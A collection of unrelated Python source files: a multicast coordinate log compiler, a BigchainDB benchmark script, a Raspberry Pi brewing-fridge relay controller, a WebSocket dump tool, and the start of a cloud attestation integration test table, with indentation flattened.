messageID = nodeData[1]
if ((nodeData[0] + nodeData[1]) in self.messageTracker):
randomLoc = None
#self.receiveSocket.sendto(nodeData[1] + ' ' + nodeData[2] + ' ' + nodeData[3] + ' ' + nodeData[4] + ' ' + nodeData[5] + ' pass it on', (MCAST_GRP, MCAST_PORT))
else:
newPickle = nodeData[0] + ' ' + nodeData[1] + ' ' + nodeData[2] + ' ' + nodeData[3] + ' ' + nodeData[4] + ' ' + nodeData[5] + ' LC: pass it on'
pickledData = pickle.dumps(newPickle)
self.receiveSocket.sendto(pickledData,('<broadcast>', 6789))
messageCounter +=1
self.updateTracker(nodeData[0]+ nodeData[1])
nodeNum = nodeData[2]
nodeLocation = self.xyzToLatLong(nodeData[3], nodeData[4], nodeData[5])#Location(nodeData[3], nodeData[4], nodeData[5])
self.nodes[nodeNum] = nodeLocation
#self.receiveSocket.sendto('1 1 1 1', (MCAST_GRP, MCAST_PORT))
#time.sleep(1)
#self.receiveSocket.sendto('1 2 1 1', (MCAST_GRP, MCAST_PORT))
#time.sleep(1)
#self.receiveSocket.sendto('1 3 1 1', (MCAST_GRP, MCAST_PORT))
def xyzToLatLong(self, x, y, z):
x = float(x)
y = float(y)
z = float(z)
r = 6731
long_0 = 0.0;
#________________________________________________
lon = long_0 + (x/r)
lat = (2 * math.atan(math.exp(y/r))) - (math.pi / 2.0)
lat *= (180.0/math.pi)
lon *= (180.0/math.pi)
# print("X", x)
# print("Y", y)
# print("Z", z)
# print("lat:", lat)
# print("long", lon)
# print("LC: Lat, Long:", lat, lon)
#________________________________________________
# r = math.sqrt(math.pow(x, 2) + math.pow(y, 2) + math.pow(z,2))
# lat = math.asin(z/r) * (180.0 / math.pi)
# lon = math.atan2(y, x) * (180.0 / math.pi)
# print("XYZ:", x, y, z)
# print("Lat/Long", lat, lon)
# return Location(lat, lon, 1.0)
#________________________________________________
# r = math.sqrt(math.pow(x, 2) + math.pow(y, 2) + math.pow(x,2))
# lat = math.asin(z/r) * (180/math.pi)
# lon = 0.0
# if (x > 0):
# lon = math.atan(y/x) * (180/math.pi)
# elif (y > 0):
# lon = math.atan(y/x) * (180/math.pi) + 180
# else:
# lon = math.atan(y/x) * (180/math.pi) - 180
return Location(lat, lon, 1.0)
def updateTracker(self, nodeNumber):
if nodeNumber in self.messageTracker:
self.messageTracker[nodeNumber] +=1;
else:
self.messageTracker[nodeNumber] = 1;
def outputNodeData(self):
while True:
for node in sorted(self.nodes):
logLine = str(self.currTimeInterval) + '.0 nem:' + str(node) + ' location gps ' + str(self.nodes[node].getX()) + ',' + str(self.nodes[node].getY())+ ',' +str(self.nodes[node].getZ()) + '\n'
self.logFile.write(logLine)
self.currTimeInterval += 1
time.sleep(1)
if __name__ == '__main__':
compiler = LogCompiler(6666)
compiler.start()
|
bench.py | import sys
from bigchaindb_driver import BigchainDB
from bigchaindb_driver.crypto import generate_keypair
import queue, threading, time
if len(sys.argv) != 5:
print('Usage: python3 bench.py load_file_path run_file_path endpoints nthread')
sys.exit(1)
alice, bob = generate_keypair(), generate_keypair()
metadata = {alice.public_key: bob.public_key}
loadFile, runFile, urls, threadNum = sys.argv[1], sys.argv[2], sys.argv[3].split(','), int(sys.argv[4])
bdbs = []
for url in urls:
bdb = BigchainDB(url)
bdbs.append(bdb)
def readFile(filepath, outQueue):
with open(filepath, 'r', encoding='UTF-8') as f:
line = f.readline()
while line is not None and line != '':
if line.startswith('INSERT') == False and line.startswith('READ') == False and line.startswith('UPDATE') == False:
line = f.readline()
continue
outQueue.put(line)
line = f.readline()
def sendTxn(lineQueue, latQueue, driver):
while lineQueue.empty() == False:
start = time.time()
line = lineQueue.get(timeout=1)
args = line.split(' ', 3)
if "INSERT" in line or "UPDATE" in line:
data = {
'data': {
args[2]: {
args[2]: args[3],
},
},
}
prepared_creation_tx = driver.transactions.prepare(
operation='CREATE',
signers=alice.public_key,
asset=data,
metadata=metadata,
)
fulfilled_creation_tx = driver.transactions.fulfill(
prepared_creation_tx, private_keys=alice.private_key)
sent_creation_tx = driver.transactions.send_async(fulfilled_creation_tx)
else:
driver.assets.get(search=args[2])
end = time.time()
if latQueue is not None:
latQueue.put(end-start)
print("Start loading init data...")
loadQueue = queue.Queue(maxsize=100000)
readFile(loadFile, loadQueue)
#tLoadRead = threading.Thread(target=readFile, args=(loadFile, loadQueue,))
#tLoadRead.start()
#time.sleep(5)
loadThreadList = []
for i in range(32):
t = threading.Thread(target=sendTxn, args=(loadQueue, None, bdbs[i%len(bdbs)],))
loadThreadList.append(t)
t.start()
#tLoadRead.join()
for t in loadThreadList:
t.join()
print("Start running experiments...")
runQueue = queue.Queue(maxsize=100000)
latencyQueue = queue.Queue(maxsize=100000)
#tRunRead = threading.Thread(target=readFile, args=(runFile, runQueue,))
#tRunRead.start()
#time.sleep(5)
readFile(runFile, runQueue)
time.sleep(5)
runThreadList = []
for i in range(threadNum):
t = threading.Thread(target=sendTxn, args=(runQueue, latencyQueue, bdbs[i%len(bdbs)],))
runThreadList.append(t)
start = time.time()
for t in runThreadList:
t.start()
time.sleep(1)
for t in runThreadList:
t.join()
end = time.time()
#allLatency = []
#def getLatency(latQueue):
lat = 0
num = 0
while latencyQueue.empty() == False:
ts = latencyQueue.get()
lat = lat + ts
num = num + 1
# allLatency.append(ts)
#tLatency = threading.Thread(target=getLatency, args=(latencyQueue,))
#tLatency.start()
# print("Before join...")
# tRunRead.join()
#for t in runThreadList:
# t.join()
print('Throughput: {} txn/s'.format(100000/(end-start)))
print('Latency: {} ms'.format(lat/num*1000))
|
pitmRelay.py | #!/usr/bin/python
# piTempBuzzer
import os
import hashlib
import struct
import socket
import syslog
import sys
import threading
import time
from pitmCfg import pitmCfg
from pitmLCDisplay import *
from pitmMcastOperations import pitmMcast
from pitmLogHandler import pitmLogHandler
from gpiotools import gpiotools
class pitmRelay:
"""
This calls deals with the logic for turning relay's on and off.
An eight-relay board is connected to a Raspberry PI for the following functions
1) Fridge Heater
2) Fridge
3) Fridge Reciculating Fan
4) Extract Fan (for boil-time)
The other pins relays are used for
Enable power to Zone A (pitmSsrRelay)
Enable power to Zone B (pitmSsrRelay)
Toggle Zone A use ** ONE OF THESE RELAYS IS BROKEN **
Toggle Zone B use
"""
def __init__(self, rpi=True):
self.cfg = pitmCfg()
self.groot = pitmLogHandler()
self.fermCoolActiveFor = -1
self.fermHeatActiveFor = -1
self.fridgeCompressorDelay = 120
self.fridgeCool = False
self.fridgeHeat = False
# Count how long we have been active for
self.meterFermH = 0
self.meterFermC = 0
self._lastValidReading = {'ferm': -1}
self.mcastMembership = False
self.zoneTemp = -1
self.zoneTarget = -1
self.zoneTempTimestamp = -1
self.zoneUpTarget = -1
self.zoneDownTarget = -1
self._mode = "UNKNOWN"
self.cycle = 4
self.recircfanCount = 0
self._gpioFermCool = None
self._gpioFermHeat = None
self._gpiorecircfan = None
self._gpioExtractor = None
if rpi:
self.gpio = gpiotools()
self.lcdDisplay = pitmLCDisplay()
self.gpio.output("fermCool", 0)
self.gpio.output('recircfan', 0)
self.gpio.output('extractor', 0)
self.gpio.output("fermHeat", 0)
def __del__(self):
self._mode = "shutdown"
self.gpio.output('fermHeat', 0)
self.gpio.output('fermCool', 0)
self.gpio.output('recircfan', 0)
self.gpio.output('extractor', 0)
def uncontrol(self):
self.groot.log("Uncontrol Called")
self._mode = "shutdown"
self.gpio.output('fermHeat', 0)
self.gpio.output('fermCool', 0)
self.gpio.output('recircfan', 0)
self.gpio.output('extractor', 0)
def submission(self):
self.groot.log("Submitting to control of Controller")
if os.path.exists('ipc/overrideModeFerm'):
self._mode = 'ferm'
return
mcast_handler = pitmMcast()
mcast_handler.open_socket(self.callback_set_mode, self.cfg.mcastPort)
def callback_set_mode(self, cm):
if cm.has_key('_mode'):
self._mode = cm['_mode']
def zoneTempThread(self):
self.groot.log("Listening for temperature'")
mcast_handler = pitmMcast()
mcast_handler.open_socket(self.callback_zone_temp_thread, self.cfg.mcastTemperaturePort)
def callback_zone_temp_thread(self, cm):
"""
This call back decodes the temperature and sets it on ourself.
It also logs
"""
if not self._mode == "idle":
if cm['currentResult'].has_key(self.cfg.fermProbe):
if cm['currentResult'][self.cfg.fermProbe]['valid']:
self.zoneTemp = float(cm['currentResult'][self.cfg.fermProbe]['temperature'])
self.zoneTempTimestamp = time.time()
if self.fridgeCompressorDelay > 0:
delay = True
else:
delay = False
self.groot.log("Temp: %s Target: %s(>%s <%s) fridgeHeat: %s/%s fridgeCool: %s/%s (delay %s) " % (self.zoneTemp, self.zoneTarget, self.zoneUpTarget, self.zoneDownTarget,
self.fridgeHeat, self._gpioFermHeat, self.fridgeCool, self._gpioFermCool, delay), importance=0)
else:
self.lcdDisplay.sendMessage("Temp Result Error", 2)
if cm.has_key("tempTargetFerm"):
# zoneDownTarget when we need to start cooling
# zoneUpTarget when we need to start heating
# zoneTarget when we need to stop cooling/heating
(self_zoneUpTarget, self_zoneDownTarget, self_zoneTarget) = cm['tempTargetFerm']
if self_zoneUpTarget < 5 or self_zoneDownTarget < 5 or self_zoneTarget < 5:
self.groot.log("Temp Target is invalid %s,%s,%s" % (cm['tempTargetFerm'][0], cm['tempTargetFerm'][1], cm['tempTargetFerm'][2]), importance=2)
else:
(self.zoneUpTarget, self.zoneDownTarget, self.zoneTarget) = cm['tempTargetFerm']
def _zone_idle_shutdown(self):
self.fridgeCompressorDelay = 301
self.gpio.output("fermCool", 0)
self.gpio.output('recircfan', 0)
self.gpio.output('extractor', 0)
self.gpio.output("fermHeat", 0)
self._gpioFermCool = False
self._gpioFermHeat = False
self._gpiorecircfan = False
self._gpioExtractor = False
self.fridgeHeat = False
self.fridgeCool = False
def _zone_boil(self):
self.gpio.output('fermHeat', 0)
self.gpio.output('fermCool', 0)
self.gpio.output('extractor', 1)
self._gpioFermCool = False
self._gpioFermHeat = False
self._gpioExtractor = True
def zoneThread(self):
"""
The main action loop that deals with switching relays
"""
while True:
self._do_zone_thread()
time.sleep(1)
def _disable_ferm_control(self):
self._turn_cooling_off()
self._turn_heating_off()
def _safety_check_for_missing_readings(self):
if self._lastValidReading['ferm'] + 100 < time.time():
self.groot.log("Critical: no valid readings for 100 seconds")
self.gpio.output('fermHeat', 0)
self._gpioFermCool = False
self._gpioFermHeat = False
self.lcdDisplay.sendMessage("CRITICAL Temp Result Error", 2)
self.gpio.output('fermCool', 0)
self.gpio.output('recircfan', 0)
self.fridgeCompressorDelay = 300
return False
return True
def _safety_check_for_unrealistic_readings(self):
if self.zoneTemp > 75 or self.zoneTemp < 4:
self.groot.log("Unrealistic Temperature Value %s:%s %s\n" % (self.zoneTemp, self.zoneTempTimestamp, self._mode))
return False
return True
def _safety_check_will_starting_the_fridge_damage_the_compressor(self):
if self.fridgeCompressorDelay > 0:
self.lcdDisplay.sendMessage(" %s - Fridge Delay" % (self.fridgeCompressorDelay), 2)
self._turn_cooling_off()
return True
return False
def _safety_check_has_fridge_been_running_too_long_if_so_turn_off(self):
if (time.time() - self.fermCoolActiveFor > 1800) and self.fermCoolActiveFor > 0:
self.groot.log("Cooling has been active for %s - resting fridge" % (time.time() - self.fermCoolActiveFor))
self._turn_cooling_off()
# we have a longer sleep if getting turn off because of long running
self.fridgeCompressorDelay = 601
return True
return False
def _is_heating_required(self):
if os.path.exists("ipc/disable-ferm-heat"):
return False
if self.zoneTemp < self.zoneUpTarget and not self.fridgeHeat:
self.groot.log("Heating Requied %s < %s" % (self.zoneTemp, self.zoneUpTarget))
return True
return False
def _turn_cooling_off(self):
self.gpio.output('fermCool', 0)
self._gpioFermCool = False
self.fridgeCool = False
if self.fridgeCompressorDelay < 1:
self.fridgeCompressorDelay = 300
if self.fermCoolActiveFor > 0:
self.meterFermC = self.meterFermC + (time.time() - self.fermCoolActiveFor)
self.groot.log("Cooling total active time %s" % (self.meterFermC))
self.fermCoolActiveFor = -1
def _turn_cooling_on(self):
"""
Important safety checks for compressor must be called before this
"""
self.lcdDisplay.sendMessage(" Cooling", 2)
self._gpioFermCool = True
self.gpio.output('fermCool', 1)
self.fridgeCool = True
if self.fermCoolActiveFor == -1:
self.fermCoolActiveFor = time.time()
def _turn_heating_on(self):
self.fridgeHeat = True
self._gpioFermHeat = True
self.gpio.output('fermHeat', 1)
self.lcdDisplay.sendMessage(" Heating", 2)
if self.fermHeatActiveFor == -1:
self.fermHeatActiveFor = time.time()
def _turn_heating_off(self):
self.fridgeHeat = False
self.gpio.output('fermHeat', 0)
self._gpioFermHeat = False
if self.fermHeatActiveFor > 0:
self.meterFermH = self.meterFermH + (time.time() - self.fermHeatActiveFor)
if self.fermHeatActiveFor > 0:
self.groot.log("Heating total active time %s" % (self.meterFermH))
self.fermHeatActiveFor = -1
def _turn_recirc_fan_on(self):
self.gpio.output('recircfan', 1)
def _turn_recirc_fan_off(self):
self.gpio.output('recircfan', 0)
def _is_cooling_required(self):
if os.path.exists("ipc/disable-fermcool"):
return False
if self.zoneTemp > self.zoneDownTarget:
self.groot.log("Cooling Required %s > %s" % (self.zoneTemp, self.zoneDownTarget))
return True
return False
def _zone_ferm(self):
self.fridgeCompressorDelay = self.fridgeCompressorDelay - 1
safety_check_ok = self._safety_check_for_missing_readings()
if not safety_check_ok:
self.groot.log("Unrealistic readings!")
# Cannot continue because we have no valid reading
return
unrealistic_values_check_ok = self._safety_check_for_unrealistic_readings()
if not unrealistic_values_check_ok:
return
if not self.fridgeHeat and not self.fridgeCool:
self.lcdDisplay.sendMessage("", 2)
if os.path.exists("ipc/no-ferm-control"):
self._disable_ferm_control()
if self._gpiorecircfan == None:
self.gpio.output('recircfan', 0)
self._gpiorecircfan = False
if self._gpioExtractor == None:
self.gpio.output('extractor', 0)
self._gpioExtractor = False
self._lastValidReading['ferm'] = time.time()
# self.lcdDisplay.sendMessage(" - Target %sC" %(self.zoneTarget),1)
heating_required = self._is_heating_required()
cooling_required = self._is_cooling_required()
if heating_required:
self._turn_cooling_off()
self._turn_heating_on()
self._turn_recirc_fan_on()
elif cooling_required:
self._turn_heating_off()
if self._safety_check_will_starting_the_fridge_damage_the_compressor():
self._turn_recirc_fan_off()
elif self._safety_check_has_fridge_been_running_too_long_if_so_turn_off():
self._turn_recirc_fan_off()
else:
self._turn_recirc_fan_on()
self._turn_cooling_on()
if self.fridgeHeat and self.zoneTemp > self.zoneTarget - 0.15:
self.groot.log("Target Reached stopping heat active for %s" % (time.time() - self.fermHeatActiveFor))
self._turn_cooling_off()
self._turn_heating_off()
self._turn_recirc_fan_off()
if self.fridgeCool and self.zoneTemp < self.zoneTarget + 0.15:
self.groot.log("Target Reached stopping cooling active for %s" % (time.time() - self.fermCoolActiveFor))
self._turn_cooling_off()
self._turn_heating_off()
self._turn_recirc_fan_off()
def _do_zone_thread(self):
if self._mode == "idle" or self._mode == "shutdown":
self._zone_idle_shutdown()
elif self._mode.count("boil"):
self._zone_boil()
elif self._mode == "ferm":
if self._lastValidReading['ferm'] == -1:
self._lastValidReading['ferm'] = time.time()
self._zone_ferm()
def broadcastResult(self):
mcast_handler = pitmMcast()
while 1:
controlMessage = {}
controlMessage['gpiorecircfan'] = self._gpiorecircfan
controlMessage['gpioExtractor'] = self._gpioExtractor
controlMessage['gpioFermCool'] = self._gpioFermCool
controlMessage['gpioFermHeat'] = self._gpioFermHeat
mcast_handler.send_mcast_message(controlMessage, self.cfg.mcastRelayPort, 'relay')
time.sleep(1)
if __name__ == '__main__':
try:
controller = pitmRelay()
#
broadcastResult = threading.Thread(target=controller.broadcastResult)
broadcastResult.daemon = True
broadcastResult.start()
# get under the control of the contoller
controlThread = threading.Thread(target=controller.submission)
controlThread.daemon = True
controlThread.start()
# get temperature status from zone a
zoneTempThread = threading.Thread(target=controller.zoneTempThread)
zoneTempThread.daemon = True
zoneTempThread.start()
# # start a relay thread
zoneRelayThread = threading.Thread(target=controller.zoneThread)
zoneRelayThread.daemon = True
zoneRelayThread.start()
while 1:
time.sleep(1)
except KeyboardInterrupt:
controller.uncontrol()
pass
|
wsdump.py | #!/Users/ethan/Documents/Proxabot/venv/bin/python3
"""
websocket - WebSocket client library for Python
Copyright (C) 2010 Hiroki Ohtani(liris)
This library is free software; you can redistribute it and/or
modify it under the terms of the GNU Lesser General Public
License as published by the Free Software Foundation; either
version 2.1 of the License, or (at your option) any later version.
This library is distributed in the hope that it will be useful,
but WITHOUT ANY WARRANTY; without even the implied warranty of
MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU
Lesser General Public License for more details.
You should have received a copy of the GNU Lesser General Public
License along with this library; if not, write to the Free Software
Foundation, Inc., 51 Franklin Street, Fifth Floor, Boston, MA 02110-1301 USA
"""
import argparse
import code
import sys
import threading
import time
import ssl
import gzip
import zlib
from urllib.parse import urlparse
import websocket
try:
import readline
except ImportError:
pass
def get_encoding():
encoding = getattr(sys.stdin, "encoding", "")
if not encoding:
return "utf-8"
else:
return encoding.lower()
OPCODE_DATA = (websocket.ABNF.OPCODE_TEXT, websocket.ABNF.OPCODE_BINARY)
ENCODING = get_encoding()
class VAction(argparse.Action):
def __call__(self, parser, args, values, option_string=None):
if values is None:
values = "1"
try:
values = int(values)
except ValueError:
values = values.count("v") + 1
setattr(args, self.dest, values)
def parse_args():
parser = argparse.ArgumentParser(description="WebSocket Simple Dump Tool")
parser.add_argument("url", metavar="ws_url",
help="websocket url. ex. ws://echo.websocket.org/")
parser.add_argument("-p", "--proxy",
help="proxy url. ex. http://127.0.0.1:8080")
parser.add_argument("-v", "--verbose", default=0, nargs='?', action=VAction,
dest="verbose",
help="set verbose mode. If set to 1, show opcode. "
"If set to 2, enable to trace websocket module")
parser.add_argument("-n", "--nocert", action='store_true',
help="Ignore invalid SSL cert")
parser.add_argument("-r", "--raw", action="store_true",
help="raw output")
parser.add_argument("-s", "--subprotocols", nargs='*',
help="Set subprotocols")
parser.add_argument("-o", "--origin",
help="Set origin")
parser.add_argument("--eof-wait", default=0, type=int,
help="wait time(second) after 'EOF' received.")
parser.add_argument("-t", "--text",
help="Send initial text")
parser.add_argument("--timings", action="store_true",
help="Print timings in seconds")
parser.add_argument("--headers",
help="Set custom headers. Use ',' as separator")
return parser.parse_args()
class RawInput:
def raw_input(self, prompt):
line = input(prompt)
if ENCODING and ENCODING != "utf-8" and not isinstance(line, str):
line = line.decode(ENCODING).encode("utf-8")
elif isinstance(line, str):
line = line.encode("utf-8")
return line
class InteractiveConsole(RawInput, code.InteractiveConsole):
def write(self, data):
sys.stdout.write("\033[2K\033[E")
# sys.stdout.write("\n")
sys.stdout.write("\033[34m< " + data + "\033[39m")
sys.stdout.write("\n> ")
sys.stdout.flush()
def read(self):
return self.raw_input("> ")
class NonInteractive(RawInput):
def write(self, data):
sys.stdout.write(data)
sys.stdout.write("\n")
sys.stdout.flush()
def read(self):
return self.raw_input("")
def main():
start_time = time.time()
args = parse_args()
if args.verbose > 1:
websocket.enableTrace(True)
options = {}
if args.proxy:
p = urlparse(args.proxy)
options["http_proxy_host"] = p.hostname
options["http_proxy_port"] = p.port
if args.origin:
options["origin"] = args.origin
if args.subprotocols:
options["subprotocols"] = args.subprotocols
opts = {}
if args.nocert:
opts = {"cert_reqs": ssl.CERT_NONE, "check_hostname": False}
if args.headers:
options['header'] = list(map(str.strip, args.headers.split(',')))
ws = websocket.create_connection(args.url, sslopt=opts, **options)
if args.raw:
console = NonInteractive()
else:
console = InteractiveConsole()
print("Press Ctrl+C to quit")
def recv():
try:
frame = ws.recv_frame()
except websocket.WebSocketException:
return websocket.ABNF.OPCODE_CLOSE, None
if not frame:
raise websocket.WebSocketException("Not a valid frame %s" % frame)
elif frame.opcode in OPCODE_DATA:
return frame.opcode, frame.data
elif frame.opcode == websocket.ABNF.OPCODE_CLOSE:
ws.send_close()
return frame.opcode, None
elif frame.opcode == websocket.ABNF.OPCODE_PING:
ws.pong(frame.data)
return frame.opcode, frame.data
return frame.opcode, frame.data
def recv_ws():
while True:
opcode, data = recv()
msg = None
if opcode == websocket.ABNF.OPCODE_TEXT and isinstance(data, bytes):
data = str(data, "utf-8")
if isinstance(data, bytes) and len(data) > 2 and data[:2] == b'\037\213': # gzip magick
try:
data = "[gzip] " + str(gzip.decompress(data), "utf-8")
except:
pass
elif isinstance(data, bytes):
try:
data = "[zlib] " + str(zlib.decompress(data, -zlib.MAX_WBITS), "utf-8")
except:
pass
if isinstance(data, bytes):
data = repr(data)
if args.verbose:
msg = "%s: %s" % (websocket.ABNF.OPCODE_MAP.get(opcode), data)
else:
msg = data
if msg is not None:
if args.timings:
console.write(str(time.time() - start_time) + ": " + msg)
else:
console.write(msg)
if opcode == websocket.ABNF.OPCODE_CLOSE:
break
thread = threading.Thread(target=recv_ws)
thread.daemon = True
thread.start()
if args.text:
ws.send(args.text)
while True:
try:
message = console.read()
ws.send(message)
except KeyboardInterrupt:
return
except EOFError:
time.sleep(args.eof_wait)
return
if __name__ == "__main__":
try:
main()
except Exception as e:
print(e)
|
oldtest.py | '''
SPDX-License-Identifier: Apache-2.0
Copyright 2017 Massachusetts Institute of Technology.
'''
import unittest
import threading
import tornado_requests
import os
import json
import base64
import configparser
import common
import crypto
import tempfile
import signal
import subprocess
import queue
import uuid
import time
import tenant
import _io
from distutils.dir_util import copy_tree
import shutil
sentinel = None
cv_process = None
cn_process = None
cn_process_list = []
queue = queue.Queue()
num_threads = 5
config = configparser.RawConfigParser()
config.read(common.CONFIG_FILE)
cloudverifier_port = config.get('general', 'cloudverifier_port')
cloudagent_port = config.get('general', 'cloudagent_port')
registrar_port = config.get('general', 'registrar_port')
cloudagent_ip = config.get('tenant', 'cloudagent_ip')
cloudverifier_ip = config.get('tenant', 'cloudverifier_ip')
registrar_ip = config.get('tenant', 'cloudverifier_ip')
tpm_policy = json.loads(config.get('tenant', 'tpm_policy'))
my_cert = config.get('tenant', 'my_cert')
ca_cert = config.get('tenant', 'ca_cert')
private_key = config.get('tenant', 'private_key')
test_num_cloudagents = config.getint('general', 'test_num_cloudagents')
test_duration = config.getint('general', 'test_duration')
# cv_persistence_filename = config.get('cloud_verifier', 'persistence_filename')
# en_persistence_filename = config.get('registrar', 'persistence_filename')
cv_persistence_filename = None
en_persistence_filename = None
K = None
U = None
V = None
def readKUV():
global K, U, V
# read the keys in
f = open('content_keys.txt', 'r')
K = base64.b64decode(f.readline())
U = base64.b64decode(f.readline())
V = base64.b64decode(f.readline())
f.close()
def text_callback(request, context):
context.status_code = 402
return '{}'
class Test(unittest.TestCase):
cloudverifier_process = None
@classmethod
def setUpClass(cls):
cls.test_table = {
"test_cloudagent_tenant_get_nonce": {
"prerun_function": {"name": "launch_cloudagent", "argument": None},
"state_change_functions": [
{
"function_name": "test_cloudagent_tenant_get_nonce",
"http_request_verb": "GET",
"http_request_ip": cloudagent_ip,
"http_request_port": cloudagent_port,
"http_request_query": {"nonce": "ThisIsThePasswordABC"},
"http_request_path": "/v1/quotes/tenant",
"http_result_status_expected": 200,
"check_function": {"name": "check_test_cloudagent_tenant_get_nonce"},
}
],
"postrun_function": {"name": "kill_cloudagent", "argument": None},
},
"test_cloudagent_tenant_get_quote": {
"prerun_function": {"name": "launch_cloudagent", "argument": None},
"state_change_functions": [
{
"function_name": "test_cloudagent_tenant_get_quote",
"http_request_verb": "POST",
"http_request_ip": cloudagent_ip,
"http_request_port": cloudagent_port,
"http_request_path": "/v1/quotes/tenant",
"http_request_body": '{"encrypt_check": "K+oD4GfBMAdOFy94ZxTU2hB77tySSB75VVz2Zo4jN02txhNK2KiO5JhE1SRIUVASMZMW/VQUS9WgWdCUaJ+LOTWSuQ13alG4P4cLoamBr9c=","encrypted_key":"rBWIxK4i6zTl/M69Yyh2hmX+itDR9QCx4CIqmuRrEN3JAIUc2M+balr8gPD9r3Bs0OxYRC8/kcxBNo9Bsm93WZKwlmbZt2uVxhfaAqXwdGVpMBnM3bQnAEj1LIFoZZyQ48PVIdrEO4WW73Z2X3fplEFgOC3YT3lzluYgrn8iBkMRm+o2pJMdhynh6xLguszLX7qDOccPIIJch14ftWlsy6Ya9a6LHr9+hIfs4p2ATVVSl1wtUbf/ouNJdqUPAiFc4oXsg+kHQzWWiipjsAm871cA4wlvUb+/D4mFz1p3PRAK9hcICGwKoanWh8jbeuYnoqkch2EoHeLqayrisfNogg=="}',
"http_result_status_expected": 200,
}
],
"postrun_function": {"name": "kill_cloudagent", "argument": None},
},
"test_cloudverifier_tenant_provide_v": {
# "prerun_function" : {"name":"launch_cloudverifier", "argument": None},
"state_change_functions": [
{
"function_name": "test_cloudverifier_tenant_provide_v",
# "pre_function" : {"name":"do_mock_for_test_cloudverifier_tenant_provide_v", "argument": None},
"http_request_verb": "POST",
"http_request_ip": cloudverifier_ip,
"http_request_port": cloudverifier_port,
"http_request_path": "/v1/instances",
"http_request_body": '{"v": "nsRIy93UeeAi3GhAxpEcMH6R7OmaB7ArBdn2bEgyEwU=","agent_id":"06480EC4-6BF3-4F00-8323-FE6AE5868297","cloudagent_ip":"127.0.0.1","cloudagent_port":"8882","tpm_policy": {"00": "0000000000000000000000000000000000000000", "mask": "0x400801", "22": "ffffffffffffffffffffffffffffffffffffffff"}}',
"http_result_status_expected": 200,
# "concurrent_instances" : 10,
# "concurrent_new_thread_function" : "new_thread",
# "test_iterations" : 100,
},
],
},
"test_concurrent_access": {
"prerun_function": {"name": "launch_cloudverifier", "argument": None},
"state_change_functions": [
{
"function_name": "test_concurrent_access",
"http_request_verb": "POST",
"http_request_ip": cloudverifier_ip,
"http_request_port": cloudverifier_port,
"http_request_path": "/v1/instances",
"http_request_body": '{"v": "nsRIy93UeeAi3GhAxpEcMH6R7OmaB7ArBdn2bEgyEwU=","agent_id":"06480EC4-6BF3-4F00-8323-FE6AE5868297","cloudagent_ip":"127.0.0.1","cloudagent_port":"8882","tpm_policy": {"00": "0000000000000000000000000000000000000000", "mask": "0x400801", "22": "ffffffffffffffffffffffffffffffffffffffff"}}',
"http_result_status_expected": 200,
"concurrency": {"instances": 5, "new_thread_function": "new_thread"},
"test_iterations": 100,
},
],
"state_validation_functions": [
{
"function_name": "test_agent_id_list",
"http_request_verb": "GET",
"http_request_ip": cloudverifier_ip,
"http_request_port": cloudverifier_port,
"http_request_path": "/v1/instances",
# "http_request_body": '{"v": "nsRIy93UeeAi3GhAxpEcMH6R7OmaB7ArBdn2bEgyEwU=","agent_id":"06480EC4-6BF3-4F00-8323-FE6AE5868297","cloudagent_ip":"127.0.0.1","cloudagent_port":"8882","tpm_policy": {"00": "0000000000000000000000000000000000000000", "mask": "0x400801", "22": "ffffffffffffffffffffffffffffffffffffffff"}}',
"http_result_status_expected": 200,
"check_function": {"name": "check_and_delete_all_entries", "argument": 500}
},
],
"postrun_function": {"name": "kill_cloudverifier", "argument": None},
},
"test_concurrent_cloudnodiness": {
# "prerun_function" : {"name":"launch_cloudagents", "args": {'starting_port':9000, 'num_cloudagent_instances':250}},
"prerun_function": {"name": "launch_cloudagents", "args": {'port_file': 'cloudagent_port.txt', 'num_cloudagent_instances': test_num_cloudagents}},
"state_change_functions": [
{
"pre_function": {"name": "test_concurrent_cloudnodiness_modify_request", "argument": 500},
"function_name": "test_concurrent_cloudnodiness",
"http_request_verb": "POST",
"http_request_ip": cloudverifier_ip,
"http_request_port": cloudverifier_port,
"http_request_path": "/v1/instances",
"http_request_body": '{"v": "nsRIy93UeeAi3GhAxpEcMH6R7OmaB7ArBdn2bEgyEwU=","agent_id":"C432FBB3-D2F1-4A97-9EF7-75BD81C00000","cloudagent_ip":"cloudagent_ip.txt","cloudagent_port":"cloudagent_port.txt","tpm_policy": {"22":"ffffffffffffffffffffffffffffffffffffffff","16":"0000000000000000000000000000000000000000"} }',
"http_result_status_expected": 200,
"test_iterations": test_num_cloudagents,
"post_function": {"name": "test_concurrent_cloudnodiness_reset_request", "args": {"ip_file": "cloudagent_ip.txt", "port_file": "cloudagent_port.txt"}},
},
],
"postrun_function": {"name": "kill_cloudagents_after_delay", "args": {'sleep': test_duration, 'port_file': 'cloudagent_port.txt', 'num_cloudagent_instances': test_num_cloudagents}},
},
"test_full_integration_happy_path": {
# "prerun_function" : {"name":"launch_required_servers", "argument": None},
"state_change_functions": [
{
"function_name": "do_cloudagent_part",
"http_request_verb": "GET",
"http_request_ip": cloudagent_ip,
"http_request_port": cloudagent_port,
"http_request_path": "/v1/quotes/tenant",
"http_request_query": {"nonce": "ThisIsThePasswordABC"},
"http_result_status_expected": 200,
"check_function": {"name": "provide_e"},
# "concurrent_new_thread_function" : "new_thread",
# "test_iterations" : 100,
},
{
"function_name": "do_cloudverifier_part",
"http_request_verb": "POST",
"http_request_ip": cloudverifier_ip,
"http_request_port": cloudverifier_port,
"http_request_path": "/v1/instances",
"http_request_body": '{"v": "XrNfEiODfu1fdXGtWbA+Wk02UhBxx1jTq7zhbC54ROA=","agent_id":"C432FBB3-D2F1-4A97-9EF7-75BD81C866E9","cloudagent_ip":"127.0.0.1","cloudagent_port":"8882","tpm_policy": {"00": "0000000000000000000000000000000000000000", "mask": "0x400801", "22": "ffffffffffffffffffffffffffffffffffffffff"}}',
"http_result_status_expected": 200,
"check_function": {"name": "check_test_sleep", "argument": 5},
# "concurrent_new_thread_function" : "new_thread",
# "test_iterations" : 100,
},
],
# "postrun_function" : {"name":"kill_required_servers", "argument": None},
},
"test_persistance_file_load": {
"prerun_function": {"name": "launch_cloudverifier", "args": '{"06480EC4-6BF3-4F00-8323-FE6AE5868297": {"tpm_policy": {"00": "0000000000000000000000000000000000000000", "mask": "0x400801", "22": "ffffffffffffffffffffffffffffffffffffffff"}, "ip": "127.0.0.1", "port": "8882", "v": "nsRIy93UeeAi3GhAxpEcMH6R7OmaB7ArBdn2bEgyEwU="}}'},
"state_change_functions": [
{
"function_name": "test_persistance_file_load",
"http_request_verb": "GET",
